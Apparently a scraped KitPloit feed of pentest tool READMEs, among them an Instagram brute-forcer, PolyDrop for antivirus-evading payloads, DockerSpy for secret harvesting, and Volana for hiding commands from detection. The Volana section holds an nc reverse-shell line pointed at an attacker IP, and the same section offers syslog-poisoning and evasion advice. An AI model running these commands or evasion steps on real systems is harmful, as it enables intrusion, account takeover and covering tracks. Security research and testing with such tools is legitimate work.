To ensure Selenium can locate the GeckoDriver executable: - Windows: 1. Move the geckodriver.exe to a directory (e.g., C:\WebDrivers\). 2. Add this directory to the system's PATH: - Open Environment Variables. - Under System Variables, find and select the Path variable, then click Edit. - Click New and enter the directory path where geckodriver.exe is stored. - Click OK to save. - macOS/Linux: 1. Move the geckodriver file to /usr/local/bin/ or another directory in your PATH. 2. Use the following command in the terminal: bash sudo mv geckodriver /usr/local/bin/ Ensure /usr/local/bin/ is in your PATH.

Install as a command-line tool

pipx install wappalyzer

Install as a library

To use it as a library, install it with pip inside an isolated container e.g. venv or docker. You may also --break-system-packages to do a 'regular' install but it is not recommended.

Install with docker

Steps

  1. Clone the repository:
git clone https://github.com/s0md3v/wappalyzer-next.git
cd wappalyzer-next
  1. Build and run with Docker Compose:
docker compose up -d
  1. To scan URLs using the Docker container:

  2. Scan a single URL:

docker compose run --rm wappalyzer -i https://example.com
  • Scan Multiple URLs from a file:
docker compose run --rm wappalyzer -i https://example.com -oJ output.json

For Users

Some common usage examples are given below, refer to list of all options for more information.

  • Scan a single URL: wappalyzer -i https://example.com
  • Scan multiple URLs from a file: wappalyzer -i urls.txt -t 10
  • Scan with authentication: wappalyzer -i https://example.com -c "sessionid=abc123; token=xyz789"
  • Export results to JSON: wappalyzer -i https://example.com -oJ results.json

Options

Note: For accuracy use 'full' scan type (default). 'fast' and 'balanced' do not use browser emulation.

  • -i: Input URL or file containing URLs (one per line)
  • --scan-type: Scan type (default: 'full')
  • fast: Quick HTTP-based scan (sends 1 request)
  • balanced: HTTP-based scan with more requests
  • full: Complete scan using wappalyzer extension
  • -t, --threads: Number of concurrent threads (default: 5)
  • -oJ: JSON output file path
  • -oC: CSV output file path
  • -oH: HTML output file path
  • -c, --cookie: Cookie header string for authenticated scans

For Developers

The python library is a available on pypi as wappalyzer and can be imported with the same name.

Using the Library

The main function you'll interact with is analyze():

from wappalyzer import analyze

# Basic usage
results = analyze('https://example.com')

# With options
results = analyze(
url='https://example.com',
scan_type='full', # 'fast', 'balanced', or 'full'
threads=3,
cookie='sessionid=abc123'
)

analyze() Function Parameters

  • url (str): The URL to analyze
  • scan_type (str, optional): Type of scan to perform
  • 'fast': Quick HTTP-based scan
  • 'balanced': HTTP-based scan with more requests
  • 'full': Complete scan including JavaScript execution (default)
  • threads (int, optional): Number of threads for parallel processing (default: 3)
  • cookie (str, optional): Cookie header string for authenticated scans

Return Value

Returns a dictionary with the URL as key and detected technologies as value:

{
"https://github.com": {
"Amazon S3": {"version": "", "confidence": 100, "categories": ["CDN"], "groups": ["Servers"]},
"lit-html": {"version": "1.1.2", "confidence": 100, "categories": ["JavaScript libraries"], "groups": ["Web development"]},
"React Router": {"version": "6", "confidence": 100, "categories": ["JavaScript frameworks"], "groups": ["Web development"]},
"https://google.com" : {},
"https://example.com" : {},
}}

FAQ

Why use Firefox instead of Chrome?

Firefox extensions are .xpi files which are essentially zip files. This makes it easier to extract data and slightly modify the extension to make this tool work.

What is the difference between 'fast', 'balanced', and 'full' scan types?

  • fast: Sends a single HTTP request to the URL. Doesn't use the extension.
  • balanced: Sends additional HTTP requests to .js files, /robots.txt annd does DNS queries. Doesn't use the extension.
  • full: Uses the official Wappalyzer extension to scan the URL in a headless browser.


☐ β˜† βœ‡ KitPloit - PenTest Tools!

Instagram-Brute-Force-2024 - Instagram Brute Force 2024 Compatible With Python 3.13 / X64 Bit / Only Chrome Browser

By: Unknown β€” April 13th 2025 at 12:30


Instagram Brute Force CPU/GPU Supported 2024

(Use option 2 while running the script.)

(Option 1 is on development)

(Chrome should be downloaded in device.)

Compatible and Tested (GUI Supported Operating Systems Only)

Python 3.13 x64 bit Unix / Linux / Mac / Windows 8.1 and higher


Install Requirements

pip install -r requirements.txt

How to run

python3 instagram_brute_force.py [instagram_username_without_hashtag]
python3 instagram_brute_force.py mrx161


☐ β˜† βœ‡ KitPloit - PenTest Tools!

PolyDrop - A BYOSI (Bring-Your-Own-Script-Interpreter) Rapid Payload Deployment Toolkit

By: Unknown β€” September 23rd 2024 at 11:30


BYOSI

- Bring-Your-Own-Script-Interpreter

- Leveraging the abuse of trusted applications, one is able to deliver a compatible script interpreter for a Windows, Mac, or Linux system as well as malicious source code in the form of the specific script interpreter of choice. Once both the malicious source code and the trusted script interpeter are safely written to the target system, one could simply execute said source code via the trusted script interpreter.

PolyDrop

- Leverages thirteen scripting languages to perform the above attack.


The following langues are wholly ignored by AV vendors including MS-Defender: - tcl - php - crystal - julia - golang - dart - dlang - vlang - nodejs - bun - python - fsharp - deno

All of these languages were allowed to completely execute, and establish a reverse shell by MS-Defender. We assume the list is even longer, given that languages such as PHP are considered "dead" languages.

- Currently undetectable by most mainstream Endpoint-Detection & Response vendors.

The total number of vendors that are unable to scan or process just PHP file types is 14, and they are listed below:

  • Alibaba
  • Avast-Mobile
  • BitDefenderFalx
  • Cylance
  • DeepInstinct
  • Elastic
  • McAfee Scanner
  • Palo Alto Networks
  • SecureAge
  • SentinelOne (Static ML)
  • Symantec Mobile Insight
  • Trapmine
  • Trustlook
  • Webroot

And the total number of vendors that are unable to accurately identify malicious PHP scripts is 54, and they are listed below:

  • Acronis (Static ML)
  • AhnLab-V3
  • ALYac
  • Antiy-AVL
  • Arcabit
  • Avira (no cloud)
  • Baidu
  • BitDefender
  • BitDefenderTheta
  • ClamAV
  • CMC
  • CrowdStrike Falcon
  • Cybereason
  • Cynet
  • DrWeb
  • Emsisoft
  • eScan
  • ESET-NOD32
  • Fortinet
  • GData
  • Gridinsoft (no cloud)
  • Jiangmin
  • K7AntiVirus
  • K7GW
  • Kaspersky
  • Lionic
  • Malwarebytes
  • MAX
  • MaxSecure
  • NANO-Antivirus
  • Panda
  • QuickHeal
  • Sangfor Engine Zero
  • Skyhigh (SWG)
  • Sophos
  • SUPERAntiSpyware
  • Symantec
  • TACHYON
  • TEHTRIS
  • Tencent
  • Trellix (ENS)
  • Trellix (HX)
  • TrendMicro
  • TrendMicro-HouseCall
  • Varist
  • VBA32
  • VIPRE
  • VirIT
  • ViRobot
  • WithSecure
  • Xcitium
  • Yandex
  • Zillya
  • ZoneAlarm by Check Point
  • Zoner

With this in mind, and the absolute shortcomings on identifying PHP based malware we came up with the theory that the 13 identified languages are also an oversight by these vendors, including CrowdStrike, Sentinel1, Palo Alto, Fortinet, etc. We have been able to identify that at the very least Defender considers these obviously malicious payloads as plaintext.

Disclaimer

We as the maintainers, are in no way responsible for the misuse or abuse of this product. This was published for legitimate penetration testing/red teaming purposes, and for educational value. Know the applicable laws in your country of residence before using this script, and do not break the law whilst using this. Thank you and have a nice day.

EDIT

In case you are seeing all of the default declarations, and wondering wtf guys. There is a reason; this was built to be more moduler for later versions. For now, enjoy the tool and feel free to post issues. They'll be addressed as quickly as possible.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

ModTracer - ModTracer Finds Hidden Linux Kernel Rootkits And Then Make Visible Again

By: Unknown β€” September 15th 2024 at 11:30


ModTracer FindsΒ HiddenΒ LinuxΒ KernelΒ Rootkits and then make visible again.


Another way to make an LKM visible is using the imperius trick: https://github.com/MatheuZSecurity/Imperius



☐ β˜† βœ‡ KitPloit - PenTest Tools!

DockerSpy - DockerSpy Searches For Images On Docker Hub And Extracts Sensitive Information Such As Authentication Secrets, Private Keys, And More

By: Unknown β€” September 14th 2024 at 15:22


DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more.


What is Docker?

Docker is an open-source platform that automates the deployment, scaling, and management of applications using containerization technology. Containers allow developers to package an application and its dependencies into a single, portable unit that can run consistently across various computing environments. Docker simplifies the development and deployment process by ensuring that applications run the same way regardless of where they are deployed.

About Docker Hub

Docker Hub is a cloud-based repository where developers can store, share, and distribute container images. It serves as the largest library of container images, providing access to both official images created by Docker and community-contributed images. Docker Hub enables developers to easily find, download, and deploy pre-built images, facilitating rapid application development and deployment.

Why OSINT on Docker Hub?

Open Source Intelligence (OSINT) on Docker Hub involves using publicly available information to gather insights and data from container images and repositories hosted on Docker Hub. This is particularly important for identifying exposed secrets for several reasons:

  1. Security Audits: By analyzing Docker images, organizations can uncover exposed secrets such as API keys, authentication tokens, and private keys that might have been inadvertently included. This helps in mitigating potential security risks.

  2. Incident Prevention: Proactively searching for exposed secrets in Docker images can prevent security breaches before they happen, protecting sensitive information and maintaining the integrity of applications.

  3. Compliance: Ensuring that container images do not expose secrets is crucial for meeting regulatory and organizational security standards. OSINT helps verify that no sensitive information is unintentionally disclosed.

  4. Vulnerability Assessment: Identifying exposed secrets as part of regular security assessments allows organizations to address these vulnerabilities promptly, reducing the risk of exploitation by malicious actors.

  5. Enhanced Security Posture: Continuously monitoring Docker Hub for exposed secrets strengthens an organization's overall security posture, making it more resilient against potential threats.

Utilizing OSINT on Docker Hub to find exposed secrets enables organizations to enhance their security measures, prevent data breaches, and ensure the confidentiality of sensitive information within their containerized applications.

How DockerSpy Works

DockerSpy obtains information from Docker Hub and uses regular expressions to inspect the content for sensitive information, such as secrets.

Getting Started

To use DockerSpy, follow these steps:

  1. Installation: Clone the DockerSpy repository and install the required dependencies.
git clone https://github.com/UndeadSec/DockerSpy.git && cd DockerSpy && make
  1. Usage: Run DockerSpy from terminal.
dockerspy

Custom Configurations

To customize DockerSpy configurations, edit the following files: - Regular Expressions - Ignored File Extensions

Disclaimer

DockerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.

Contribution

Contributions to DockerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.

About the Author

DockerSpy is developed and maintained by Alisson Moretto (UndeadSec)

I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.

Consider following me:

DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. (2) DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. (3) DockerSpy searches for images on Docker Hub and extracts sensitive information such as authentication secrets, private keys, and more. (4)


Thanks

Special thanks to @akaclandestine



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Ashok - A OSINT Recon Tool, A.K.A Swiss Army Knife

By: Unknown β€” June 26th 2024 at 12:30


Reconnaissance is the first phase of penetration testing which means gathering information before any real attacks are planned So Ashok is an Incredible fast recon tool for penetration tester which is specially designed for Reconnaissance" title="Reconnaissance">Reconnaissance phase. And in Ashok-v1.1 you can find the advanced google dorker and wayback crawling machine.



Main Features

- Wayback Crawler Machine
- Google Dorking without limits
- Github Information Grabbing
- Subdomain Identifier
- Cms/Technology Detector With Custom Headers

Installation

~> git clone https://github.com/ankitdobhal/Ashok
~> cd Ashok
~> python3.7 -m pip3 install -r requirements.txt

How to use Ashok?

A detailed usage guide is available on Usage section of the Wiki.

But Some index of options is given below:

Docker

Ashok can be launched using a lightweight Python3.8-Alpine Docker image.

$ docker pull powerexploit/ashok-v1.2
$ docker container run -it powerexploit/ashok-v1.2 --help


    Credits



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Hfinger - Fingerprinting HTTP Requests

    By: Unknown β€” June 24th 2024 at 12:30


    Tool for Fingerprinting HTTP requests of malware. Based on Tshark and written in Python3. Working prototype stage :-)

    Its main objective is to provide unique representations (fingerprints) of malware requests, which help in their identification. Unique means here that each fingerprint should be seen only in one particular malware family, yet one family can have multiple fingerprints. Hfinger represents the request in a shorter form than printing the whole request, but still human interpretable.

    Hfinger can be used in manual malware analysis but also in sandbox systems or SIEMs. The generated fingerprints are useful for grouping requests, pinpointing requests to particular malware families, identifying different operations of one family, or discovering unknown malicious requests omitted by other security systems but which share fingerprint.

    An academic paper accompanies work on this tool, describing, for example, the motivation of design choices, and the evaluation of the tool compared to p0f, FATT, and Mercury.


      The idea

      The basic assumption of this project is that HTTP requests of different malware families are more or less unique, so they can be fingerprinted to provide some sort of identification. Hfinger retains information about the structure and values of some headers to provide means for further analysis. For example, grouping of similar requests - at this moment, it is still a work in progress.

      After analysis of malware's HTTP requests and headers, we have identified some parts of requests as being most distinctive. These include: * Request method * Protocol version * Header order * Popular headers' values * Payload length, entropy, and presence of non-ASCII characters

      Additionally, some standard features of the request URL were also considered. All these parts were translated into a set of features, described in details here.

      The above features are translated into varying length representation, which is the actual fingerprint. Depending on report mode, different features are used to fingerprint requests. More information on these modes is presented below. The feature selection process will be described in the forthcoming academic paper.

      Installation

      Minimum requirements needed before installation: * Python >= 3.3, * Tshark >= 2.2.0.

      Installation available from PyPI:

      pip install hfinger

      Hfinger has been tested on Xubuntu 22.04 LTS with tshark package in version 3.6.2, but should work with older versions like 2.6.10 on Xubuntu 18.04 or 3.2.3 on Xubuntu 20.04.

      Please note that as with any PoC, you should run Hfinger in a separated environment, at least with Python virtual environment. Its setup is not covered here, but you can try this tutorial.

      Usage

      After installation, you can call the tool directly from a command line with hfinger or as a Python module with python -m hfinger.

      For example:

      foo@bar:~$ hfinger -f /tmp/test.pcap
      [{"epoch_time": "1614098832.205385000", "ip_src": "127.0.0.1", "ip_dst": "127.0.0.1", "port_src": "53664", "port_dst": "8080", "fingerprint": "2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4"}]

      Help can be displayed with short -h or long --help switches:

      usage: hfinger [-h] (-f FILE | -d DIR) [-o output_path] [-m {0,1,2,3,4}] [-v]
      [-l LOGFILE]

      Hfinger - fingerprinting malware HTTP requests stored in pcap files

      optional arguments:
      -h, --help show this help message and exit
      -f FILE, --file FILE Read a single pcap file
      -d DIR, --directory DIR
      Read pcap files from the directory DIR
      -o output_path, --output-path output_path
      Path to the output directory
      -m {0,1,2,3,4}, --mode {0,1,2,3,4}
      Fingerprint report mode.
      0 - similar number of collisions and fingerprints as mode 2, but using fewer features,
      1 - representation of all designed features, but a little more collisions than modes 0, 2, and 4,
      2 - optimal (the default mode),
      3 - the lowest number of generated fingerprints, but the highest number of collisions,
      4 - the highest fingerprint entropy, but slightly more fingerprints than modes 0-2
      -v, --verbose Report information about non-standard values in the request
      (e.g., non-ASCII characters, no CRLF tags, values not present in the configuration list).
      Without --logfile (-l) will print to the standard error.
      -l LOGFILE, --logfile LOGFILE
      Output logfile in the verbose mode. Implies -v or --verbose switch.

      You must provide a path to a pcap file (-f), or a directory (-d) with pcap files. The output is in JSON format. It will be printed to standard output or to the provided directory (-o) using the name of the source file. For example, output of the command:

      hfinger -f example.pcap -o /tmp/pcap

      will be saved to:

      /tmp/pcap/example.pcap.json

      Report mode -m/--mode can be used to change the default report mode by providing an integer in the range 0-4. The modes differ on represented request features or rounding modes. The default mode (2) was chosen by us to represent all features that are usually used during requests' analysis, but it also offers low number of collisions and generated fingerprints. With other modes, you can achieve different goals. For example, in mode 3 you get a lower number of generated fingerprints but a higher chance of a collision between malware families. If you are unsure, you don't have to change anything. More information on report modes is here.

      Beginning with version 0.2.1 Hfinger is less verbose. You should use -v/--verbose if you want to receive information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n), and other problems with analyzed requests that are not application errors. When any such issues are encountered in the verbose mode, they will be printed to the standard error output. You can also save the log to a defined location using -l/--log switch (it implies -v/--verbose). The log data will be appended to the log file.

      Using hfinger in a Python application

      Beginning with version 0.2.0, Hfinger supports importing to other Python applications. To use it in your app simply import hfinger_analyze function from hfinger.analysis and call it with a path to the pcap file and reporting mode. The returned result is a list of dicts with fingerprinting results.

      For example:

      from hfinger.analysis import hfinger_analyze

      pcap_path = "SPECIFY_PCAP_PATH_HERE"
      reporting_mode = 4
      print(hfinger_analyze(pcap_path, reporting_mode))

      Beginning with version 0.2.1 Hfinger uses logging module for logging information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n), and other problems with analyzed requests that are not application errors. Hfinger creates its own logger using name hfinger, but without prior configuration log information in practice is discarded. If you want to receive this log information, before calling hfinger_analyze, you should configure hfinger logger, set log level to logging.INFO, configure log handler up to your needs, add it to the logger. More information is available in the hfinger_analyze function docstring.

      Fingerprint creation

      A fingerprint is based on features extracted from a request. Usage of particular features from the full list depends on the chosen report mode from a predefined list (more information on report modes is here). The figure below represents the creation of an exemplary fingerprint in the default report mode.

      Three parts of the request are analyzed to extract information: URI, headers' structure (including method and protocol version), and payload. Particular features of the fingerprint are separated using | (pipe). The final fingerprint generated for the POST request from the example is:

      2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4

      The creation of features is described below in the order of appearance in the fingerprint.

      Firstly, URI features are extracted: * URI length represented as a logarithm base 10 of the length, rounded to an integer, (in the example URI is 43 characters long, so log10(43)β‰ˆ2), * number of directories, (in the example there are 3 directories), * average directory length, represented as a logarithm with base 10 of the actual average length of the directory, rounded to an integer, (in the example there are three directories with total length of 20 characters (6+6+8), so log10(20/3)β‰ˆ1), * extension of the requested file, but only if it is on a list of known extensions in hfinger/configs/extensions.txt, * average value length represented as a logarithm with base 10 of the actual average value length, rounded to one decimal point, (in the example two values have the same length of 4 characters, what is obviously equal to 4 characters, and log10(4)β‰ˆ0.6).

      Secondly, header structure features are analyzed: * request method encoded as first two letters of the method (PO), * protocol version encoded as an integer (1 for version 1.1, 0 for version 1.0, and 9 for version 0.9), * order of the headers, * and popular headers and their values.

      To represent order of the headers in the request, each header's name is encoded according to the schema in hfinger/configs/headerslow.json, for example, User-Agent header is encoded as us-ag. Encoded names are separated by ,. If the header name does not start with an upper case letter (or any of its parts when analyzing compound headers such as Accept-Encoding), then encoded representation is prefixed with !. If the header name is not on the list of the known headers, it is hashed using FNV1a hash, and the hash is used as encoding.

      When analyzing popular headers, the request is checked if they appear in it. These headers are: * Connection * Accept-Encoding * Content-Encoding * Cache-Control * TE * Accept-Charset * Content-Type * Accept * Accept-Language * User-Agent

      When the header is found in the request, its value is checked against a table of typical values to create pairs of header_name_representation:value_representation. The name of the header is encoded according to the schema in hfinger/configs/headerslow.json (as presented before), and the value is encoded according to schema stored in hfinger/configs directory or configs.py file, depending on the header. In the above example Accept is encoded as ac and its value */* as as-as (asterisk-asterisk), giving ac:as-as. The pairs are inserted into fingerprint in order of appearance in the request and are delimited using /. If the header value cannot be found in the encoding table, it is hashed using the FNV1a hash.
      If the header value is composed of multiple values, they are tokenized to provide a list of values delimited with ,, for example, Accept: */*, text/* would give ac:as-as,te-as. However, at this point of development, if the header value contains a "quality value" tag (q=), then the whole value is encoded with its FNV1a hash. Finally, values of User-Agent and Accept-Language headers are directly encoded using their FNV1a hashes.

      Finally, in the payload features: * presence of non-ASCII characters, represented with the letter N, and with A otherwise, * payload's Shannon entropy, rounded to an integer, * and payload length, represented as a logarithm with base 10 of the actual payload length, rounded to one decimal point.

      Report modes

      Hfinger operates in five report modes, which differ in features represented in the fingerprint, thus information extracted from requests. These are (with the number used in the tool configuration): * mode 0 - producing a similar number of collisions and fingerprints as mode 2, but using fewer features, * mode 1 - representing all designed features, but producing a little more collisions than modes 0, 2, and 4, * mode 2 - optimal (the default mode), representing all features which are usually used during requests' analysis, but also offering a low number of collisions and generated fingerprints, * mode 3 - producing the lowest number of generated fingerprints from all modes, but achieving the highest number of collisions, * mode 4 - offering the highest fingerprint entropy, but also generating slightly more fingerprints than modes 0-2.

      The modes were chosen in order to optimize Hfinger's capabilities to uniquely identify malware families versus the number of generated fingerprints. Modes 0, 2, and 4 offer a similar number of collisions between malware families, however, mode 4 generates a little more fingerprints than the other two. Mode 2 represents more request features than mode 0 with a comparable number of generated fingerprints and collisions. Mode 1 is the only one representing all designed features, but it increases the number of collisions by almost two times comparing to modes 0, 1, and 4. Mode 3 produces at least two times fewer fingerprints than other modes, but it introduces about nine times more collisions. Description of all designed features is here.

      The modes consist of features (in the order of appearance in the fingerprint): * mode 0: * number of directories, * average directory length represented as an integer, * extension of the requested file, * average value length represented as a float, * order of headers, * popular headers and their values, * payload length represented as a float. * mode 1: * URI length represented as an integer, * number of directories, * average directory length represented as an integer, * extension of the requested file, * variable length represented as an integer, * number of variables, * average value length represented as an integer, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as an integer, * payload length represented as an integer. * mode 2: * URI length represented as an integer, * number of directories, * average directory length represented as an integer, * extension of the requested file, * average value length represented as a float, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as an integer, * payload length represented as a float. * mode 3: * URI length represented as an integer, * average directory length represented as an integer, * extension of the requested file, * average value length represented as an integer, * order of headers. * mode 4: * URI length represented as a float, * number of directories, * average directory length represented as a float, * extension of the requested file, * variable length represented as a float, * average value length represented as a float, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as a float, * payload length represented as a float.



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      XMGoat - Composed of XM Cyber terraform templates that help you learn about common Azure security issues

      By: Unknown β€” June 22nd 2024 at 12:30


      XM Goat is composed of XM Cyber terraform templates that help you learn about common Azure security issues. Each template is a vulnerable environment, with some significant misconfigurations. Your job is to attack and compromise the environments.

      Here's what to do for each environment:

      1. Run installation and then get started.

      2. With the initial user and service principal credentials, attack the environment based on the scenario flow (for example, XMGoat/scenarios/scenario_1/scenario1_flow.png).

      3. If you need help with your attack, refer to the solution (for example, XMGoat/scenarios/scenario_1/solution.md).

      4. When you're done learning the attack, clean up.


      Requirements

      • Azure tenant
      • Terafform version 1.0.9 or above
      • Azure CLI
      • Azure User with Owner permissions on Subscription and Global Admin privileges in AAD

      Installation

      Run these commands:

      $ az login
      $ git clone https://github.com/XMCyber/XMGoat.git
      $ cd XMGoat
      $ cd scenarios
      $ cd scenario_<\SCENARIO>

      Where <\SCENARIO> is the scenario number you want to complete

      $ terraform init
      $ terraform plan -out <\FILENAME>
      $ terraform apply <\FILENAME>

      Where <\FILENAME> is the name of the output file

      Get started

      To get the initial user and service principal credentials, run the following query:

      $ terraform output --json

      For Service Principals, use application_id.value and application_secret.value.

      For Users, use username.value and password.value.

      Cleaning up

      After completing the scenario, run the following command in order to clean all the resources created in your tenant

      $ az login
      $ cd XMGoat
      $ cd scenarios
      $ cd scenario_<\SCENARIO>

      Where <\SCENARIO> is the scenario number you want to complete

      $ terraform destroy


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Extrude - Analyse Binaries For Missing Security Features, Information Disclosure And More...

      By: Unknown β€” June 21st 2024 at 12:30


      Analyse binaries for missing security features, information disclosure and more.

      Extrude is in the early stages of development, and currently only supports ELF and MachO binaries. PE (Windows) binaries will be supported soon.


      Usage

      Usage:
      extrude [flags] [file]

      Flags:
      -a, --all Show details of all tests, not just those which failed.
      -w, --fail-on-warning Exit with a non-zero status even if only warnings are discovered.
      -h, --help help for extrude

      Docker

      You can optionally run extrude with docker via:

      docker run -v `pwd`:/blah -it ghcr.io/liamg/extrude /blah/targetfile

      Supported Checks

      ELF

      • PIE
      • RELRO
      • BIND NOW
      • Fortified Source
      • Stack Canary
      • NX Stack

      MachO

      • PIE
      • Stack Canary
      • NX Stack
      • NX Heap
      • ARC

      Windows

      Coming soon...

      TODO

      • Add support for PE
      • Add secret scanning
      • Detect packers


      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Volana - Shell Command Obfuscation To Avoid Detection Systems

      By: Unknown β€” June 19th 2024 at 12:30


      Shell command obfuscation to avoid SIEM/detection system

      During pentest, an important aspect is to be stealth. For this reason you should clear your tracks after your passage. Nevertheless, many infrastructures log command and send them to a SIEM in a real time making the afterwards cleaning part alone useless.

      volana provide a simple way to hide commands executed on compromised machine by providing it self shell runtime (enter your command, volana executes for you). Like this you clear your tracks DURING your passage


      Usage

      You need to get an interactive shell. (Find a way to spawn it, you are a hacker, it's your job ! otherwise). Then download it on target machine and launch it. that's it, now you can type the command you want to be stealthy executed

      ## Download it from github release
      ## If you do not have internet access from compromised machine, find another way
      curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

      ## Execute it
      ./volana

      ## You are now under the radar
      volana Β» echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1 #you are allowed to be a bit cocky
      volana Β» [command]

      Keyword for volana console: * ring: enable ring mode ie each command is launched with plenty others to cover tracks (from solution that monitor system call) * exit: exit volana console

      from non interactive shell

      Imagine you have a non interactive shell (webshell or blind rce), you could use encrypt and decrypt subcommand. Previously, you need to build volana with embedded encryption key.

      On attacker machine

      ## Build volana with encryption key
      make build.volana-with-encryption

      ## Transfer it on TARGET (the unique detectable command)
      ## [...]

      ## Encrypt the command you want to stealthy execute
      ## (Here a nc bindshell to obtain a interactive shell)
      volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
      >>> ENCRYPTED COMMAND

      Copy encrypted command and executed it with your rce on target machine

      ./volana decr [encrypted_command]
      ## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)

      Why not just hide command with echo [command] | base64 ? And decode on target with echo [encoded_command] | base64 -d | bash

      Because we want to be protected against systems that trigger alert for base64 use or that seek base64 text in command. Also we want to make investigation difficult and base64 isn't a real brake.

      Detection

      Keep in mind that volana is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.

      By detected we mean if we are able to trigger an alert if a certain command has been executed.

      Hide from

      Only the volana launching command line will be catched. 🧠 However, by adding a space before executing it, the default bash behavior is to not save it

      • Detection systems that are based on history command output
      • Detection systems that are based on history files
      • .bash_history, ".zsh_history" etc ..
      • Detection systems that are based on bash debug traps
      • Detection systems that are based on sudo built-in logging system
      • Detection systems tracing all processes syscall system-wide (eg opensnoop)
      • Terminal (tty) recorder (script, screen -L, sexonthebash, ovh-ttyrec, etc..)
      • Easy to detect & avoid: pkill -9 script
      • Not a common case
      • screen is a bit more difficult to avoid, however it does not register input (secret input: stty -echo => avoid)
      • Command detection Could be avoid with volana with encryption

      Visible for

      • Detection systems that have alert for unknown command (volana one)
      • Detection systems that are based on keylogger
      • Easy to avoid: copy/past commands
      • Not a common case
      • Detection systems that are based on syslog files (e.g. /var/log/auth.log)
      • Only for sudo or su commands
      • syslog file could be modified and thus be poisoned as you wish (e.g for /var/log/auth.log:logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
      • Detection systems that are based on syscall (eg auditd,LKML/eBPF)
      • Difficult to analyze, could be make unreadable by making several diversion syscalls
      • Custom LD_PRELOAD injection to make log
      • Not a common case at all

      Bug bounty

      Sorry for the clickbait title, but no money will be provided for contibutors. πŸ›

      Let me know if you have found: * a way to detect volana * a way to spy console that don't detect volana commands * a way to avoid a detection system

      Report here

      Credit



      ☐ β˜† βœ‡ KitPloit - PenTest Tools!

      Sttr - Cross-Platform, Cli App To Perform Various Operations On String

      By: Unknown β€” June 8th 2024 at 12:30


      sttr is command line software that allows you to quickly run various transformation operations on the string.


      // With input prompt
      sttr

      // Direct input
      sttr md5 "Hello World"

      // File input
      sttr md5 file.text
      sttr base64-encode image.jpg

      // Reading from different processor like cat, curl, printf etc..
      echo "Hello World" | sttr md5
      cat file.txt | sttr md5

      // Writing output to a file
      sttr yaml-json file.yaml > file-output.json

      :movie_camera: Demo

      :battery: Installation

      Quick install

      You can run the below curl to install it somewhere in your PATH for easy use. Ideally it will be installed at ./bin folder

      curl -sfL https://raw.githubusercontent.com/abhimanyu003/sttr/main/install.sh | sh

      Webi

      MacOS / Linux

      curl -sS https://webi.sh/sttr | sh

      Windows

      curl.exe https://webi.ms/sttr | powershell

      See here

      Homebrew

      If you are on macOS and using Homebrew, you can install sttr with the following:

      brew tap abhimanyu003/sttr
      brew install sttr

      Snap

      sudo snap install sttr

      Arch Linux

      yay -S sttr-bin

      Scoop

      scoop bucket add sttr https://github.com/abhimanyu003/scoop-bucket.git
      scoop install sttr

      Go

      go install github.com/abhimanyu003/sttr@latest

      Manually

      Download the pre-compiled binaries from the Release! page and copy them to the desired location.

      :books: Guide

      • After installation simply run sttr command.
      // For interactive menu
      sttr
      // Provide your input
      // Press two enter to open operation menu
      // Press `/` to filter various operations.
      // Can also press UP-Down arrows select various operations.
      • Working with help.
      sttr -h

      // Example
      sttr zeropad -h
      sttr md5 -h
      • Working with files input.
      sttr {command-name} {filename}

      sttr base64-encode image.jpg
      sttr md5 file.txt
      sttr md-html Readme.md
      • Writing output to file.
      sttr yaml-json file.yaml > file-output.json
      • Taking input from other command.
      curl https: //jsonplaceholder.typicode.com/users | sttr json-yaml
      • Chaining the different processor.
      sttr md5 hello | sttr base64-encode

      echo "Hello World" | sttr base64-encode | sttr md5

      :boom: Supported Operations

      Encode/Decode

      • [x] ascii85-encode - Encode your text to ascii85
      • [x] ascii85-decode - Decode your ascii85 text
      • [x] base32-decode - Decode your base32 text
      • [x] base32-encode - Encode your text to base32
      • [x] base64-decode - Decode your base64 text
      • [x] base64-encode - Encode your text to base64
      • [x] base85-encode - Encode your text to base85
      • [x] base85-decode - Decode your base85 text
      • [x] base64url-decode - Decode your base64 url
      • [x] base64url-encode - Encode your text to url
      • [x] html-decode - Unescape your HTML
      • [x] html-encode - Escape your HTML
      • [x] rot13-encode - Encode your text to ROT13
      • [x] url-decode - Decode URL entities
      • [x] url-encode - Encode URL entities

      Hash

      • [x] bcrypt - Get the Bcrypt hash of your text
      • [x] md5 - Get the MD5 checksum of your text
      • [x] sha1 - Get the SHA1 checksum of your text
      • [x] sha256 - Get the SHA256 checksum of your text
      • [x] sha512 - Get the SHA512 checksum of your text

      String

      • [x] camel - Transform your text to CamelCase
      • [x] kebab - Transform your text to kebab-case
      • [x] lower - Transform your text to lower case
      • [x] reverse - Reverse Text ( txeT esreveR )
